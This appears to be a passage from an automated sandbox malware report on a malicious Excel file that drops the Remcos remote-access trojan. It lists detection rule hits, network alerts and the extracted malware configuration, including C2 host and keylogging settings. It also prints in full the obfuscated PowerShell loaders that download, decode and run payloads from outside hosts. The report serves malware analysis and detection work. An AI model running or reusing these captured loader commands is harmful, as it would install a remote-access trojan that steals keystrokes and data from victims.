hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 892, ProcessName: wscript.exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3976, TargetFilename: C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline
                    Sigma detected: Modification of IE Registry Settings
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3552, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", CommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICA
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3976, TargetFilename: C:\Users\user\AppData\Local\Temp\qgk1oeyy.wdn.ps1

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", ProcessId: 3320, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 800, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:57:20.567470+010020241971A Network Trojan was detected192.3.220.2980192.168.2.2249164TCP
                    2024-11-20T16:57:26.891141+010020241971A Network Trojan was detected192.3.220.2980192.168.2.2249166TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:57:20.442035+010020244491Attempted User Privilege Gain192.168.2.2249164192.3.220.2980TCP
                    2024-11-20T16:57:26.891127+010020244491Attempted User Privilege Gain192.168.2.2249166192.3.220.2980TCP
                    2024-11-20T16:57:55.899830+010020244491Attempted User Privilege Gain192.168.2.2249173192.3.220.2980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:58:12.263546+010020204251Exploit Kit Activity Detected192.3.220.2980192.168.2.2249175TCP
                    2024-11-20T16:58:29.669499+010020204251Exploit Kit Activity Detected192.3.220.2980192.168.2.2249178TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:58:12.263546+010020204241Exploit Kit Activity Detected192.3.220.2980192.168.2.2249175TCP
                    2024-11-20T16:58:29.669499+010020204241Exploit Kit Activity Detected192.3.220.2980192.168.2.2249178TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:58:15.230868+010020365941Malware Command and Control Activity Detected192.168.2.2249176192.3.101.1496946TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:57:16.955138+010020576351A Network Trojan was detected192.3.220.2980192.168.2.2249175TCP
                    2024-11-20T16:57:16.955138+010020576351A Network Trojan was detected192.3.220.2980192.168.2.2249178TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:57:52.360798+010020490381A Network Trojan was detected142.215.209.78443192.168.2.2249168TCP
                    2024-11-20T16:58:14.591521+010020490381A Network Trojan was detected142.215.209.78443192.168.2.2249174TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:58:19.031413+010028033043Unknown Traffic192.168.2.2249177178.237.33.5080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:57:16.955138+010028582951A Network Trojan was detected192.3.220.2980192.168.2.2249178TCP
                    2024-11-20T16:57:16.955138+010028582951A Network Trojan was detected192.3.220.2980192.168.2.2249175TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:58:11.865687+010028587961A Network Trojan was detected192.168.2.2249175192.3.220.2980TCP
                    2024-11-20T16:58:29.247487+010028587961A Network Trojan was detected192.168.2.2249178192.3.220.2980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T16:57:36.883221+010028587951A Network Trojan was detected192.168.2.2249167192.3.220.2980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: pi-77159.xlsAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\~DFC4030D08E8153FBD.TMPAvira: detection malicious, Label: TR/AVI.Agent.xoswb
                    Found malware configuration
                    Source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["banaya.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VCYBO3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Multi AV Scanner detection for submitted file
                    Source: pi-77159.xlsReversingLabs: Detection: 26%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Machine Learning detection for sample
                    Source: pi-77159.xlsJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,34_2_0043293A
                    Source: CasPol.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406764 _wcslen,CoGetObject,34_2_00406764

                    Phishing

                    barindex
                    Yara detected HtmlPhish44
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta, type: DROPPED
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49174 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49171 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49172 version: TLS 1.2
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdb source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdbhP source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdb source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdbhP source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,34_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,34_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,34_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044D5E9 FindFirstFileExA,34_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,34_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406AC2 FindFirstFileW,FindNextFileW,34_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,34_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,34_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,34_2_00408DA7
